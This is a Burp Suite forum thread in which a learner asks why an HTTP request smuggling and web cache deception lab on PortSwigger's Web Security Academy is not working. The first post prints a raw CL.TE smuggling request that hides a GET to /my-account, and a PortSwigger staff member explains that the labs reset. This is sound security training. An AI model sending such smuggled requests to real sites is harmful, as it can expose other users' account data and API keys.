Burp Suite User Forum


Exploiting HTTP request smuggling to perform web cache deception NOT WORKING

kairosdev | Last updated: Sep 09, 2021 07:08PM UTC

I'm trying to solve this challenge with no success. I've typed this code in "Repeater" and sent it innumerable times, but I can't get a 401 response.

    POST / HTTP/1.1
    Host: ac921f9e1e43510980d00f8c0079000b.web-security-academy.net
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 42
    Transfer-Encoding: chunked

    0

    GET /my-account HTTP/1.1
    X-Ignore: X

Nor can I log in as "carlos"; I had to log in as "wiener".

Uthman, PortSwigger Agent | Last updated: Sep 10, 2021 04:05PM UTC

Have you tried waiting for the lab to reset before attempting to complete it again?

kairosdev | Last updated: Sep 10, 2021 05:40PM UTC

How long do I have to wait? How do I know it has been reset?

kairosdev | Last updated: Sep 10, 2021 06:35PM UTC

No problem. I got the solution from this video: https://www.youtube.com/watch?v=h2CUQ2wN9OA. If someone has the same problem, this video explains the easier way of doing it, even though you don't have to go back to your Proxy History to see the API Key. You can see it in the "Repeater" response.

Uthman, PortSwigger Agent | Last updated: Sep 13, 2021 08:10AM UTC

Thanks for sharing your findings, Kairos. The labs usually reset after ~15 minutes.
